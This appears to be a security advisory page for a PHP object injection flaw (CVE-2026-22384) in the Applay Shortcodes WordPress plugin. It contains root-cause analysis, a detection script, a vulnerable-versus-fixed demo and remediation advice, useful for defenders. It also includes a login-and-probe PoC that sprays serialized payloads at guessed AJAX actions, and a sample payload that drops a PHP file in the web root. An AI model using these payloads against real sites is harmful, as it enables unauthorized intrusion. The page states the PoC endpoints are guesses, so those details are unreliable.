Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-22384: Applay – Shortcodes <= 3.7 – Authenticated (Contributor+) PHP Object Injection (applay-shortcodes)

Severity High (CVSS 7.5)
CWE 502
Vulnerable Version 3.7
Patched Version
Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-22384 (metadata-based):
The Applay – Shortcodes WordPress plugin, in versions up to and including 3.7, contains an authenticated PHP object injection vulnerability. Authenticated attackers with Contributor-level access or higher can exploit it by submitting attacker-controlled serialized data to a plugin endpoint that hands it to unserialize(). The CVSS 7.5 score reflects the impact when a suitable POP (property-oriented programming) gadget chain is available on the target; without one, the injected object is instantiated but has no side effects.

Atomic Edge research identifies the root cause as insecure deserialization of user-controlled input. The plugin likely passes unsanitized POST or GET parameter data directly to PHP’s unserialize() function. This inference comes from the CWE-502 classification and the vulnerability description. Without code access, Atomic Edge cannot confirm the exact vulnerable function or endpoint, but WordPress plugin architecture suggests the vulnerability exists within an AJAX handler, shortcode processing function, or admin panel submission handler.

Exploitation requires Contributor-level WordPress credentials. The attacker sends a crafted serialized object in a request parameter to the affected plugin endpoint. The most probable vector is the WordPress AJAX handler (/wp-admin/admin-ajax.php) with an action parameter carrying a plugin-prefixed action name. Alternative vectors include REST API routes registered by the plugin, or plugin PHP files reachable directly under wp-content/plugins/. The payload contains serialized PHP objects built from POP chain gadgets present in the environment (other plugins, the theme, or vendored libraries).
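The following block is an added example, not code from the Atomic Edge page or the Applay plugin. It implements the check a WAF rule or log pipeline can apply to the vector just described: serialized PHP objects arriving as request parameters, including payloads wrapped in extra URL encoding or base64. The request bodies are constructed for the example, and the action names and parameter names in them are hypothetical guesses, not confirmed plugin identifiers.

```php
<?php
// Added example, not code from the Atomic Edge page or the Applay plugin. It
// implements the check a WAF rule or log pipeline can apply to the attack
// vector described above: serialized PHP objects submitted as parameters to
// admin-ajax.php (or any other endpoint). Runs stand-alone with the php CLI.
// The request bodies below are constructed for this example and the action
// names are hypothetical.

// Header of a serialized PHP object (O:) or custom-serialized object (C:):
// the only tokens that make unserialize() instantiate a class. JSON, plain
// text and serialized arrays of scalars do not contain this shape.
const SERIALIZED_OBJECT = '/[OC]:\d+:"[^"]{1,200}":\d+:\{/';

// Peel the wrappers attackers commonly put around a payload: up to two
// extra layers of URL encoding, and base64 applied to any layer. Returns
// every decoded form so the caller can inspect all of them.
function decode_variants(string $value): array {
    $layers = [$value];
    for ($i = 0; $i < 2; $i++) {
        $last = $layers[count($layers) - 1];
        $next = rawurldecode($last);
        if ($next === $last) {
            break;
        }
        $layers[] = $next;
    }
    $variants = $layers;
    foreach ($layers as $layer) {
        if (strlen($layer) >= 8 && preg_match('~^[A-Za-z0-9+/]+={0,2}$~', $layer)) {
            $decoded = base64_decode($layer, true);   // strict: reject non-base64
            if ($decoded !== false) {
                $variants[] = $decoded;
            }
        }
    }
    return $variants;
}

// Walk a (possibly nested) parameter array and return, keyed by parameter
// path, the object header found in each offending value.
function find_serialized_objects(array $params, string $prefix = ''): array {
    $hits = [];
    foreach ($params as $name => $value) {
        $key = $prefix === '' ? (string) $name : $prefix . '[' . $name . ']';
        if (is_array($value)) {
            $hits += find_serialized_objects($value, $key);
            continue;
        }
        foreach (decode_variants((string) $value) as $candidate) {
            if (preg_match(SERIALIZED_OBJECT, $candidate, $m)) {
                $hits[$key] = $m[0];
                break;
            }
        }
    }
    return $hits;
}

// application/x-www-form-urlencoded body -> parameter array (one URL decode)
function parse_body(string $body): array {
    parse_str($body, $params);
    return $params;
}

// Constructed sample requests: one benign core call, two payload deliveries,
// and JSON that merely mentions a class name and must not alert.
$requests = [
    ['path' => '/wp-admin/admin-ajax.php',
     'body' => 'action=heartbeat&_nonce=abc123&data%5Bwp-refresh-post-lock%5D%5Bpost_id%5D=42'],
    ['path' => '/wp-admin/admin-ajax.php',
     'body' => 'action=applay_save&data=' . rawurlencode('O:8:"stdClass":0:{}')],
    ['path' => '/wp-admin/admin-ajax.php',
     'body' => 'action=applay_save&data=' . rawurlencode(rawurlencode(base64_encode(
         'a:1:{i:0;O:9:"LogWriter":1:{s:4:"path";s:8:"/tmp/x.p";}}')))],
    ['path' => '/wp-json/applay/v1/settings',
     'body' => 'data=' . rawurlencode('{"class":"LogWriter","title":"O: hello"}')],
];

foreach ($requests as $i => $req) {
    $hits = find_serialized_objects(parse_body($req['body']));
    printf("%d %-5s %s %s\n", $i, $hits ? 'ALERT' : 'ok', $req['path'], json_encode($hits));
}
```

Requests 1 and 2 alert (the third only after the base64 and double URL-encoding layers are peeled), requests 0 and 3 pass. The pattern keys on the object header rather than on the plugin's action name, so it also catches the same payload delivered through a REST route or a directly reachable plugin file.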

Remediation requires removing unserialize() from the request path or constraining it. Developers should use JSON (json_decode()) for data interchange, validate the type and shape of the decoded data before using it, and, where serialized PHP cannot be avoided, call unserialize() with the allowed_classes option set to false or to an explicit list of plain data classes, so that no attacker-named class is instantiated and no magic method runs. WordPress best practice also requires a capability check (current_user_can()) and nonce verification (check_ajax_referer()) on every authenticated endpoint. Those checks shrink the attack surface but do not by themselves fix this bug, because a Contributor is a legitimately authenticated user who can typically obtain a valid nonce.

Successful exploitation injects arbitrary objects into the application context. With a suitable POP chain available on the target, the attacker reaches remote code execution, arbitrary file deletion or sensitive data exposure, depending on what the chain's gadgets do. No POP chain is known in the plugin itself, which limits immediate exploitation, but gadget classes in other installed plugins, the theme or vendored libraries can supply one, so the bug remains exploitable whenever the surrounding install changes. With such a chain the attacker runs code as the web server user, which is more than an administrator can do through the dashboard; in that sense a Contributor account escalates past administrator.
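The following block is an added example, not code from the Atomic Edge page or the Applay plugin. It puts the root cause above (unserialize() on request data, plus a gadget class with a side-effecting magic method standing in for a POP chain) next to the three remediations the analysis recommends, and shows what each one does with the same attacker payload. The LogWriter class, the path and line parameters, and the file paths are hypothetical; the serialized string is constructed for the example.

```php
<?php
// Added example, not code from the Atomic Edge page or the Applay plugin. It
// shows the root cause described above (unserialize() on request data plus a
// gadget class with a side-effecting magic method) next to the remediations
// the analysis recommends. Runs stand-alone with the php CLI; no WordPress
// needed. The class, parameter and path names are hypothetical.

// Records what the gadget would have done instead of doing it.
final class Audit {
    public static $events = [];
}

// Hypothetical gadget. Real POP chains are assembled from classes that already
// exist in the target's plugins, theme or vendored libraries and do something
// with attacker-controlled properties in __destruct(), __wakeup(), __toString()
// or similar.
class LogWriter {
    public $path = '/tmp/app.log';
    public $line = '';
    public function __destruct() {
        // A real gadget would call file_put_contents($this->path, $this->line),
        // which with the payload below drops a PHP file under the web root.
        Audit::$events[] = "write '{$this->line}' to {$this->path}";
    }
}

// Attacker-controlled request parameter (constructed for this example).
const EVIL = 'O:9:"LogWriter":2:{s:4:"path";s:23:"/var/www/html/shell.php";s:4:"line";s:16:"<?php phpinfo();";}';

// Vulnerable pattern: request data goes straight into unserialize(), which
// instantiates any class named in the string.
function handle_vulnerable(string $data): string {
    $obj = unserialize($data);
    return is_object($obj) ? get_class($obj) : gettype($obj);
}   // $obj is released on return, so LogWriter::__destruct() runs here

// Fix 1: forbid class instantiation. Objects come back as
// __PHP_Incomplete_Class, whose magic methods never run (PHP >= 7.0).
function handle_allowed_classes(string $data): string {
    $obj = unserialize($data, ['allowed_classes' => false]);
    return is_object($obj) ? get_class($obj) : gettype($obj);
}

// Fix 2: use JSON for data interchange. json_decode() never creates
// application objects, and serialized PHP is simply invalid JSON.
function handle_json(string $data): ?array {
    $decoded = json_decode($data, true, 8);   // assoc arrays, shallow depth
    return is_array($decoded) ? $decoded : null;
}

// Fix 3: validate shape before use: only the keys this handler expects, each
// with the expected scalar type; unknown keys are dropped, bad types rejected.
function validate_settings(?array $in): ?array {
    if ($in === null) {
        return null;
    }
    $expected = ['path' => 'string', 'line' => 'string'];
    $out = [];
    foreach ($expected as $key => $type) {
        if (!array_key_exists($key, $in) || gettype($in[$key]) !== $type) {
            return null;
        }
        $out[$key] = $in[$key];
    }
    return $out;
}

Audit::$events = [];
$r = handle_vulnerable(EVIL);
printf("vulnerable:      %-23s gadget: %s\n", $r, Audit::$events[0] ?? 'not fired');

Audit::$events = [];
$r = handle_allowed_classes(EVIL);
printf("allowed_classes: %-23s gadget: %s\n", $r, Audit::$events[0] ?? 'not fired');

$r = handle_json(EVIL);
printf("json_decode:     %s\n", $r === null ? 'rejected (not JSON)' : 'accepted');

$r = validate_settings(handle_json('{"path":"/tmp/app.log","line":"ok","extra":1}'));
printf("validated JSON:  %s\n", json_encode($r));
```

The vulnerable handler returns LogWriter and the gadget records a write to /var/www/html/shell.php; with allowed_classes set to false the same string yields __PHP_Incomplete_Class and nothing fires; json_decode() rejects the string outright; and the validator passes only the two expected keys through. In a real WordPress AJAX handler the hardened version would additionally sit behind check_ajax_referer() and current_user_can(), but as noted above those calls do not stop an authenticated Contributor, so the deserialization itself is what has to change.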

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-22384 - Applay - Shortcodes <= 3.7 - Authenticated (Contributor+) PHP Object Injection

/**
 * Proof of Concept for CVE-2026-22384
 * This script demonstrates authenticated PHP object injection in the Applay Shortcodes plugin.
 * Assumptions based on WordPress plugin patterns (the advisory names no endpoint, so the
 * action and parameter names below are guesses, not confirmed values):
 * 1. Vulnerability exists in an AJAX endpoint
 * 2. The AJAX action contains 'applay' or 'shortcodes' prefix
 * 3. A serialized parameter is passed via POST
 * 4. Contributor-level authentication is required
 *
 * WARNING: This PoC uses a benign serialized object for demonstration.
 * Actual exploitation requires a viable POP chain.
 */

// Site root (no trailing slash). The login URL and AJAX endpoint derive from it.
$site_url   = 'https://example.com';
$target_url = $site_url . '/wp-admin/admin-ajax.php';
$username   = 'contributor_user';
$password   = 'contributor_pass';
$cookie_jar = sys_get_temp_dir() . '/cve-2026-22384-cookies.txt';

// Benign serialized object for testing: an empty stdClass has no magic methods,
// so unserialize() produces an inert object. In real exploitation this string
// would be a POP chain built from classes present on the target.
$serialized_payload = serialize(new stdClass());   // O:8:"stdClass":0:{}

// WordPress authentication via wp-login.php. The login form carries no nonce;
// the only prerequisite is the test cookie WordPress sets on the first GET.
function wordpress_login($site_url, $username, $password, $cookie_jar) {
    $login_url = $site_url . '/wp-login.php';
    $admin_url = $site_url . '/wp-admin/';

    // Initial GET so the cookie jar receives wordpress_test_cookie
    $ch = curl_init($login_url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEJAR      => $cookie_jar,
        CURLOPT_COOKIEFILE     => $cookie_jar,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_SSL_VERIFYPEER => false   // lab targets often use self-signed certs
    ]);
    curl_exec($ch);

    // POST login credentials; redirect_to lands on the dashboard on success
    $post_fields = http_build_query([
        'log'         => $username,
        'pwd'         => $password,
        'wp-submit'   => 'Log In',
        'redirect_to' => $admin_url,
        'testcookie'  => '1'
    ]);

    curl_setopt_array($ch, [
        CURLOPT_URL        => $login_url,
        CURLOPT_POST       => true,
        CURLOPT_POSTFIELDS => $post_fields,
        CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
    ]);

    $response = curl_exec($ch);
    curl_close($ch);

    // A logged-in user landing on /wp-admin/ gets the admin bar; the login
    // form shown on failure has no element with that id.
    return strpos($response, 'id="wpadminbar"') !== false;
}

// Candidate AJAX actions based on plugin naming patterns (guesses, see header)
$potential_actions = [
    'applay_shortcodes_action',
    'applay_process',
    'shortcodes_applay',
    'applay_ajax',
    'applay_save',
    'applay_update'
];

// Candidate parameter names; all are sent in one request so each guess is covered
$potential_params = ['data', 'payload', 'input', 'serialized'];

// Perform login
if (!wordpress_login($site_url, $username, $password, $cookie_jar)) {
    die("Login failed. Check credentials.\n");
}

// Test each potential endpoint
foreach ($potential_actions as $action) {
    $fields = ['action' => $action];
    foreach ($potential_params as $param) {
        $fields[$param] = $serialized_payload;
    }
    $post_data = http_build_query($fields);

    $ch = curl_init($target_url);
    curl_setopt_array($ch, [
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => $post_data,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEFILE     => $cookie_jar,
        CURLOPT_COOKIEJAR      => $cookie_jar,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_HTTPHEADER     => ['Content-Type: application/x-www-form-urlencoded']
    ]);

    $response  = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    echo "Testing action: $action\n";
    echo "HTTP Code: $http_code\n";
    echo "Response length: " . strlen($response) . "\n";

    // admin-ajax.php answers HTTP 400 with body "0" when no handler is
    // registered for the action; anything else means the action exists.
    if ($http_code == 400 && trim($response) === '0') {
        echo "Action not registered.\n\n";
        continue;
    }

    // Look for error messages or echoed objects indicating a deserialization
    // attempt. The 'Object' check is noisy and is kept only as a coarse hint.
    if (strpos($response, 'unserialize') !== false ||
        strpos($response, 'Object') !== false ||
        preg_match('/O:\d+:"[^"]+"/', $response)) {
        echo "Potential deserialization detected for action: $action\n";
    }
    echo "\n";
}

echo "PoC completed. Review responses for deserialization indicators.\n";
echo "Note: Actual exploitation requires a viable POP chain payload.\n";
?>
